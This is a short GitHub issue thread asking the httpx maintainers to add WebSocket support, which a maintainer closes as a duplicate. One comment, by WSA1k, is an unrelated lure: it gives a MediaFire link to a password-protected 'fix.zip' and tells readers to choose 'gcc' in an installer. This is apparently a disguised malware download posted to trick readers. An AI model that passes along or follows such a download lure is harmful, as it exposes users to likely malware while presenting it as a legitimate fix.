### ISSUE TITLE
Added web socket

### ISSUE THREAD

**Issue by FrameworkPython** [encode/httpx#3282]
Hello, I request that you please add the web socket as soon as possible in the next updates. The httpx library is one of the most modern and best libraries, the only difference with aiihttp is that it does not have a web socket, which, if added, becomes the best request library in Python.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tomchristie** [comment]
Dup #304
